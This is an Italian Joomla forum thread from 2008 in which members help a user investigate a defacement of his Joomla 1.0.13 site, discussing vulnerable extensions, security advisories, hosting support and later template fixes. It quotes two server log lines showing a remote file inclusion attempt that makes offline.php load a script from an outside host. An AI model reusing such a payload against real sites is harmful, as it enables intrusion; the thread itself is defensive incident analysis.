Joomla.it Forum
Joomla! 1.0.x (versione con supporto terminato) => Le voci di Joomla.it (solo per versione Joomla 1.0.x) => : Druido 24 Jan 2008, 11:44:26
-
Salve a tutti sono leggermente disperato >:(
Il mio sito ospitato su joomlahost stamattina non andava e dopo aver contattato l'assistenza ho scoperto che è stato ackerato.
La stessa assistenza di joomlahost mi ha suggerito di fare quanto segue:
1- scaricare in locale i contenuti del sito web
2- cancellare lo spazio occupato in httpdocs
3- richiedere la riattivazione del dominio
4- una volta identificato il problema in locale risolverlo e uplodare nuovamente i contenuti.
Ma io come faccio ha identificare il problema? mi hanno detto che potrebbe essere dovuto a qualche componente non sicuro ma a memoria mi ricordo di aver installato solo joomfish, virtuemart, zoommediagallery e extcalendar.
Qualche consiglio?
Grazie.
-
Guarda qua
http://help.joomla.org/component/option,com_easyfaq/task,view/id,186/Itemid,268/
se trovi il componenete incriminato
in ogni caso insisti con jh loro sanno piu di te qualè puo essere il componenete incrininato
che te lo dicano.
-
Sto scaricando tutto il sito in locale per poi montarlo su wamp così controllo bene che componenti avevo.
Intanto grazie
-
ok
facci sapere cosa era
in ogni caso lo trovo assurdo che tu debba scaricarti tutto e poi riuplodare
???
-
ho appena chiesto all'host anche perchè mi hanno bloccato l'accesso a phpmyadmin e non posso fare il recupero del database.
comunque ho riflettuto su e sono certo che la versione di joomla era l'ultima disponibile ed i componenti installati erano solo questi:
joomfish
virtuemart
extcalendar 0.9.2
zoommediagallery 2.5.1 stable
joomlaexplorer
-
Nulla mi hanno appena risposto che non spetta a loro l'analisi di quanto successo ma solo a me, mi hanno anche detto che devo eliminare tutto il contenuto sul sito se no non mi riattivano l'host. Una volta fatto potrò scaricarmi da me il log :( speriamo di non dover buttare via l'intero sito.
-
BEL Trattamento!!!
a meno che non usi vm 1.010
gli altri non sembrano nella lista nera
-
Nulla mi hanno appena risposto che non spetta a loro l'analisi di quanto successo ma solo a me, mi hanno anche detto che devo eliminare tutto il contenuto sul sito se no non mi riattivano l'host. Una volta fatto potrò scaricarmi da me il log :( speriamo di non dover buttare via l'intero sito.
Hai in mano i log del webserver?
-
Messo tutto in locale e mi sembra funzionare benissimo, non so dove andare a cercare eventuali tracce si hacker
allego i due log di questa notte sperando che qualcuno di voi mi sappia aiutare.
Grazie.
log:
http://www.miniplane.net/Downloads.rar
-
A che ora è avvenuto il fattaccio?
-
access_log.processed:218.145.56.3 - - [23/Jan/2008:11:20:02 +0100] "GET //offline.php?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt? HTTP/1.1" 200 317 "-" "libwww-perl/5.79"
access_log.processed:218.145.56.3 - - [23/Jan/2008:11:20:02 +0100] "GET //offline.php?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt? HTTP/1.1" 200 317 "-" "libwww-perl/5.79"
Qua il server non ha restituito pagine di errore.
-
Grazie Luca ma sono un'isperto
non so cosa voglia dire che non ha restituito pagine di errore.
Comunque ho appena finito di controllare in locale le versione installate, eccole:
Joomla 1.0.13 stable
Virtuemart 1.0.13 a
Zoom media gallery 2.5.1. rc4
ExtCal Settings 0.9.2 rc4
Joomfish 1.8.2
sh404SEF 1.3 rc
Allego lo screen dei componenti
[allegato eliminato da un amministratore]
-
sarei curioso di sapere qual'è il componente incriminato!!!
dalla lista conosciuta non c'è ne nessuno di quelli elencati
hai fatto un giro sui siti degli sviluppatori magari c'è qualcosa di nuovo???
-
Ho avvisato il Dev Team, fortunatamente non è a causa del codice segnalato da Luca nello stralcio del file log.
Fortunatamanete offline.php è risultato sicuro a quel tipo di attacco.
-
prima di tutto chi ti cancella i nr di post sei tornato a 1 msg ;D ;D ;D a mente ne dovresti avere forse 4000/5000
poi se ci rendi dotti !!
grazie
-
sono io che li resetto odio le alte quote.
Comunque o ricevuto ulteriore conferma adesso che non è quella la causa. quindi bisogna cercare altrove.
-
solito discorso
loro lo sanno e non lo dicono mah!!
-
In questo, come in altri casi, sarebbe molto utile conoscere il tipo di attacco, se semplice defacement, attacco sql o altro. Non si chiede la componente ma il tipo di danno arrecato che sarebbe utile sapere per cercare la causa.
-
non so che dire, io sto guardando il sito in locale e non trovo nulla ma le mie conoscenze sono limitatissime... Vorrei scoprire qualcosa in più ma l'host mi ha detto che non è loro competenza, se mi sapete indicare come fare... volentieri.
-
si
pubblicare, dire, informare, enunciare,esprimere, pronunciare,
formulare, articolare, manifestare, esternare
dichiarare, presentare, esporre, riferire
formulare, illustrare mettere in giro la voce, strombazzare
rendere noto, fare sapere, comunicare, rivelare, manifestare, informare, proclamare, dichiarare, segnalare, riferire, notificare, diffondere, divulgare, diramare
su tutti i forum che conosci
se hai bisogno di link chiedi pure
-
druido puoi chiedere allora al host una semplice domanda.
che tipo di attacco .. era?
ci serve solo questo ... anzi, mi serve sapere solo questo ora, perchè me lo chiedono.
Non devono assolutamente dirti qual'era la componente, hanno capito anche i sassi sordi che non è di loro competenza, ma sapere il tipo di attacco ci servirebbe... magari prestino
-
Appena inviata la domanda a joomlahost, vediamo se rispondono perchè ormai sono le 18.00 e non so fino a che ora lavorino.
Comunque devo dire che ci sono rimasto un po' male, utilizzavo il loro host proprio perchè fatto appositamente per joomla. Installavo solo componenti noti... speravo fossero un po' più disponibili nel dirmi cosa fosse successo :-[ , invece hanno sbolognato dicendomi che non era colpa del loro server ma dei miei componenti.
-
Grazie druido
-
Grazie a voi per l'aiuto... appena mi rispondono riporto qui.
-
Comunque devo dire che ci sono rimasto un po' male, utilizzavo il loro host proprio perchè fatto appositamente per joomla. Installavo solo componenti noti... speravo fossero un po' più disponibili nel dirmi cosa fosse successo :-[ , invece hanno sbolognato dicendomi che non era colpa del loro server ma dei miei componenti.
probabilmente/sicuramnte c'e un problema!!!
ma uno hosta dove pensa di avere "anche" un supporto in forma di aiuto dedicato a joomla
ma forse ci sbagliamo !!!!!!!!!
-
Comunque devo dire che ci sono rimasto un po' male, utilizzavo il loro host proprio perchè fatto appositamente per joomla. Installavo solo componenti noti... speravo fossero un po' più disponibili nel dirmi cosa fosse successo :-[ , invece hanno sbolognato dicendomi che non era colpa del loro server ma dei miei componenti.
probabilmente/sicuramnte c'e un problema!!!
ma uno hosta dove pensa di avere "anche" un supporto in forma di aiuto dedicato a joomla
ma forse ci sbagliamo !!!!!!!!!
occhio a non andare ot ;)
-
Druido per quanto riguarda le tue componenti, controlla extcalendar, anche i moduli, perchè erano stati segnalati problemi con quella componente e con i moduli in passato e vedendo dall'immagine che hai fornito la data di release non vorrei che fosse una papabile tra quelle incriminate.
-
Ho riguardato la pagina dei log e ho notato che gli ultimi 2 già postati sono del 24 gennaio, poi un altro del 20 gennaio e tutti gli altri risalgono a novembre e prima.
quindi riallego qui gli ultimi 2 log più lo screen di tutti i log
rimossi
Nota moderazione: ho modificato il link perchè all'interno del file c'era pure il dump completo del tuo database con tanto di credenziali :)
Non so se può tornare utile ma le ultime operazioni fatte sul portale risalgono a ieri quando una persona con privilegi di super admin ha inserito un evento nel calendario e poi ha provato ad inserire delle foto in zoommedia ma non ci è riuscito, per ben 2 volte gli si è bloccato il browser costringendolo a riavviare il pc.
-
Bene come credevo, il problema potrebbe essere ext calendar.
Ho verificato la versione è del luglio 2006 e proprio in quel periodo erano stati segnalati problemi di sicurezza con quella componente
http://www.frsirt.com/english/advisories/2006/2711
Consigliere quindi di sopprimere momentaneamente quella componente e trovare un valido sostituto.
Al momento non credo che sia stata più migliorata con quel nome credo sia stata ripresa e cambiato nome in Jcal (gli utilizzatori saranno più precisi di me).
Non ho ancora controllato se questa componente era già segnalata nella lista di quelle pericolose, invito quindi tutti sempre controllare la lista, che trovate sia su joomla.org, che qui, che su info di joomlahost onde evitare che accadano queste spiacievoli situazioni.
Ma non solo fate attenzione che a volte è possibile che non sia la componente, ma può anche essere qualche modulo, noi aggiorniamo sempre le componenti ma a volte ci dimentichiamo dei moduli.
Se viene segnalato un problema di sicurezza controllate sempre i forum ufficiali per ricevere notizie in merito, e nel dubbio disattivate temoporaneamente quelle estensioni, aiuterete il vostro sito, i siti che sono ospitati con voi nello stesso spazio e soprattutto si eviteranno polemiche inutili che non aiutano nessuno.
P.S.
Comunque dato che siamo qui ... appena hai risposta in merito al tipo di attacco faccelo sapere.
-
Vamba intanto ti ringrazio infinitamente. :-*
Avevo controllato la lista nera e la mia versione di ext calendar mi sembrava pulita.
Comunque grazie ancora... ma se io adesso elimino il componente e rimetto tutto sul server agisco bene o è possibile che dopo essere entrati per ext calender mi abbiano lasciato qualche schifo o porta aperta in giro per il resto del portale?
-
Allora, se il sito è stato defacciato, bisognerebbe conoscere la data di creazione/modifica della index page, in modo da fare una cernita tra i log e verificare dove/cosa/come, altrimenti si rischia di perdere inutilmente tempo.
Oltre a questo bisognerebbe, a mio avviso, lavorare in accoppiata con l'hosting provider in modo da prendere le adeguate contromisure.
-
Controlla che non vi siano file strani annidati nelle cartelle.
A volte anche semplici file txt o jpg possono essere li dormienti e attendere solo una chiamata esterna per generare una sorta di reazione a catena.
Non esistare a proporci ed elencarci tutti i file che ritieni sospetti.
-
OK lo staff di joomlahost mi ha risposto, purtroppo però non penso che la risposta fosse quella che ci aspettavamo...
Salve, l'attacco in riferimento è dovuto a componenti fallati.
Controlli le versioni dei componenti installati anche facendo riferimento all'elenco dei componenti critici: http://help.joomla.org/component/option,com_easyfaq/task,view/id,186/Itemid,268/
> Sto facendo un po' di ricerche con l'aiuto di forum specifici, dove mi
> chiedono di chiedervi che tipo di attacco avete rilevato.
> Grazie
Per quanto riguarda la lista di files che potrebbero essere li dormienti sto facendo ricerche ma non ho l'occhi esperto, se vi interessa, ma non credo sono più di 200 pagine, potete scaricare l'elenco di tutti i files, cartelle e sottocatelle del mio sito. elenco rimosso
Attenzione trovere ancora il componente extcalender perchè ancora non l'ho rimosso.
Ancora grazie a tutti.
-
mah!
devo dire che la risposta è molto utile !!!!!!!
l'unica e pensare a ext calendar prova a toglierlo e riupplodare!!!!!
ma io nel frattempo mi toglierei il dubbio facendo una prova
crei un sito da un'altra parte ( magari il piu economico d'italia - avrai capito dove) e carichi esattamente il sito incrininato e vedi cosa succede.
-
Grazie per il file doc, (mi spiace vedere che non c'è stata collaborazione), ma è improponibile mettersi li e perdere tempo a scorrere 200 pagine.
Ti chiedo gentilmente inviami, se vuoi anche con messaggio privato, un link dove poter scaricare i file e controllarli direttamente, non me la sento di cercarli nel file doc farei prima con i file stessi, per verificarne la pericolosità.
Poi dopo sarà quel che sarà...........
-
Non riesco proprio a capire il perchè non venga indicato chiaramente quale sia questo benedetto componente fallato.
Se hanno realmente evidenza del fatto che il problema sia dovuto al tuo specifico sito e hanno così celermente stabilito che è un componente fallato, mi fa supporre che sappiano quale sia sto benedetto componente che è stato sfruttato per il defacement.
Perchè non indicarlo chiaramente nella risposta non ci è dato di sapere...
-
Luca si può presumere che forse realmente non lo sanno... è umano non si può sempre sapere tutto ... quindi non mi pare giusto addossare loro questa colpa.
-
nessun colpa!!
ma fanno sicuramnte prima loro a capire dove è la falla
hanno più strumenti di noi !!!!!!! per capire
-
Non sto addossando colpe a nessuno, non mi sembra però che ci sia la disponibilità alla risoluzione di un problema che interessa si un utente, ma che *dovrebbe* interessare anche l'hosting provider.
Sui miei server mi darebbe fastidio non sapere cosa è successo, anche perchè questa volta è un semplice defacement, la prossima potrebbe essere una shell.
-
Comunque io consiglierei, in attesa della versione stabile 1.0.14, se non la utilizzate, rimuovete la componente com_poll in quanto, al momento potrebbe essere soggetta a cross-site request e script insertion.
Questo in riferimento a questo messaggio, apparso su secunia, il 9.0.1.2008
Input passed via the poll options and the poll title in the com_poll component is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which will be executed in a user's browser session in context of an affected site when viewing a page containing a malicious poll.
-
Grazie per il file doc, (mi spiace vedere che non c'è stata collaborazione), ma è improponibile mettersi li e perdere tempo a scorrere 200 pagine.
Ti chiedo gentilmente inviami, se vuoi anche con messaggio privato, un link dove poter scaricare i file e controllarli direttamente, non me la sento di cercarli nel file doc farei prima con i file stessi, per verificarne la pericolosità.
Poi dopo sarà quel che sarà...........
Vamba, ti mando tutto quello che vuoi, topo l'aiuto che mi hai dato ti mando anche la fidanzata ;D
Apparte gli scherzi... non ho capito che file ti interessano ???
-
Anche se gradita come offerta, non inviare la fidanzata........ altrimenti il cross-site nel cervello me lo fa mia moglie a bastonate.
per i file ... diciamo ... tutti o ti paiono troppi ;D
(magari zippati o tarrati ...ecc ecc)
-
Vamba sto provando a mandarti un messaggio privato mi mi viene fuori scritto che "l'utente Vamba a bloccato il tuo messaggio" ???
-
prova di nuovo
-
:) OK spedito
-
Mp ricevuto.
-
OK allora ho ricreato un clone del tuo sito, non toccando alcun file (se si esclude configuration.php è ovvio) e l'ho messo online qui
http://www.joomlademo.it/miniplane/
ora vado a nanna e lasciamolo li come esca per i cattivoni.
Vediamo quanto regge.
P.S.
Dimenticavo non potrai accedere al pannello amministratore con le tue credenziali in quanto naturalmente per configurarlo ho dovuto modificarle
-
Occhio al rewrite ;)
-
si ho disattivato i sef perchè nuturalmente hanno un'impostazione diversa ... è ovvio ...
OT
Luca noto una cosa stranissima una volta su due se passo dalla home page di joomla.it mi si pianta firefox.
e crolla...
ho fatto due controllini e credo sia colpa dei filmati, forse due che chiamano lo stesso sono troppi?
-
be che dire!!!
grande vamba !!!!
alle 06.24 gira ancora !
-
OT
Luca noto una cosa stranissima una volta su due se passo dalla home page di joomla.it mi si pianta firefox.
e crolla...
ho fatto due controllini e credo sia colpa dei filmati, forse due che chiamano lo stesso sono troppi?
Nessun problema per me, qualche estensione che si arrabbia?
Provato in modalità provvisoria di firefox?
-
Forse... capito il problema. Credo che i due filmati della home, ma non ho ancora capito perchè, vanno in conflitto con i codecs video che ho installati.
Probabilmente dopo l'ultimo aggiornamento dei codecs video, si deve essere formato qualche incrocio magico.
(Probabile che sia solo un mio prob. quindi)
-
sono appena andato a vedere il mio sito, lo vedo ancora online... che vuol dire ???
Beati voi che ci capite qualcosa ;D
-
Non vuol dire niente è che per praticità invece di ricrearmi un sito in locale l'ho messo direttamente online in uno degli spazi web che ho in giro per il globo, così se ci fosse magari qualche problemuccio che non trovo ...
-
sono appena andato a vedere il mio sito, lo vedo ancora online... che vuol dire ???
Beati voi che ci capite qualcosa ;D
io Tifo perchè non si ripresenti il problema ,
se problema c'è !!!
p.s. io non ci capisco nulla, ringrazia vamba che sta facendo quello che avrebbe dovuto fare l'host visto che porta il nome del cms
edit : mi sono stufato di andare a vedere ogni tot quando mi ricordo
mi permetto di farlo controllare da site 24x7
se siete d'accordo
purtruppo ogni ora ( account free) :o
-
Bene attendo :D
Posso approfittare ancora un attimo della vostra gentilezza, andando un attimo ot.
Se dal menù aprite il collegamento "nuovo negozio" (http://www.joomlademo.it/miniplane/component/option,com_virtuemart/page,shop.browse/category_id,1/Itemid,34/) con internet explorer si apre correttamente, invece con firefox dopo la descrizione della categoria e prima del primo articolo c'è un lunghissimo spazio bianco.
Cosa può essere? come posso risolvere?
-
penso ai css del template
o ci metti mano (non chiedermi come) o cambi template
lo fa anche con opera e netscape !!!
-
Forse... capito il problema. Credo che i due filmati della home, ma non ho ancora capito perchè, vanno in conflitto con i codecs video che ho installati.
Probabilmente dopo l'ultimo aggiornamento dei codecs video, si deve essere formato qualche incrocio magico.
(Probabile che sia solo un mio prob. quindi)
sempre OT
no non se l'unico il mio non si impianatava ma vuole .....
pensavo di aver risolto con
strumneti >>>> elimina dati personali
ma dopo che ripassi dalla home un po di volte ricomincia
-
Allora .. mi sono preso la libertà di sventrare un attimo la tua template.
Nella tua originale c'erano pure le chiamate hai metatag due volte, (probabilmente un rimasuglio di un copia incolla precedente).
Ora dovrebbe funzionare su tutti e due i browser.
Ti allego i file da modificare.
Comunque io credo che tu possa tranquillamente riattivare il sito online, magari per sicurezza per alcuni giorni non attivare la componente ext_calendar .... (io qui sul mio server la lascio attiva vediamo se dai log vedo qualcosa di strano e te lo segnalo).
[allegato eliminato da un amministratore]
-
Vamba sei fantastico, appena è pronto il monumento che sto facendo innalzare in tuo onere ti chiamo e facciamo un bel rinfresco ;D
Comunque per non saper ne leggere ne scrivere io rimetto su, ma elimino ext_calender... ne troverò un altro più sicuro e come mi hai suggerito elimino la possibilità dei commenti delle foto.
-
Allora per quanto riguarda gli eventi prova a cercare Jcal, dovrebbe essere la versione aggiornata proprio di ext calendar.
Per i commenti alle foto ti consiglierei una componente poco conosciuta ma molto flessibile che puoi tranquillamente usare sia per i contenuti sia per decine e decine di altre componenti http://www.joomlatune.com/jcomments-downloads.html
Nel sito clicca su inglese se ti appare il russo ;D
La componente è gratuita.
Naturalmente per funzionare con zoomgallery necessita di una piccola modifica alla componente zoomgallery stessa ma se segui le chiare istruzioni che ci sono nel sito, questo è il link diretto all'integrazione di zoomgallery,
http://www.joomlatune.com/jcomments-zoom.html
e vedrai che non è così ostica come cosa.
Nota: la componente è gia localizzata in italiano, anzi se trovi errori di traduzione segnalali prima a me ..... così evito brutte figuracce ;) ;D
Per il monumento...... lasciamo perdere altrimenti diventa la casa dei piccioni!!!!!
Dimenticavo se incontri ostacoli chiedi pure ... se possibile e se ne ho le capacità mi fa piacere aiutarti.
-
Ancora grazie di tutto,
per il calendario alla fine ho messo su com_events perchè Jcal è a pagamento ;D
Per com_events ho controllato, è segnalata la versione 1.3 beta a rischio e consigliano di aggiornare per non avere probblemi... io ho installato la 1.4.2 spero di essere sicuro.
-
Bene attendo :D
Posso approfittare ancora un attimo della vostra gentilezza, andando un attimo ot.
Se dal menù aprite il collegamento "nuovo negozio" (http://www.joomlademo.it/miniplane/component/option,com_virtuemart/page,shop.browse/category_id,1/Itemid,34/) con internet explorer si apre correttamente, invece con firefox dopo la descrizione della categoria e prima del primo articolo c'è un lunghissimo spazio bianco.
Cosa può essere? come posso risolvere?
Ciao!! Cavolo anche a me da questo problema, dal secondo articolo in poi me li mette sempre allineati ma iniziano dopo i moduli left, lasciandomi molto spazio dal primo.
E' un problema del template di joomla o di virtuemart? (uso le versioni 10.0.13)
Con IE invece va tutto bene, probabilmente e' il template di joomla ( dm_arrow_red) che essendo tutto con div fa casini...
Ale
-
Usando FLOAT vedo che adesso va bene solo che devo fare in modo di visualizzare solo X prodotti per pagine altrimenti va fuori template con float o anche con absolute...
Ciao!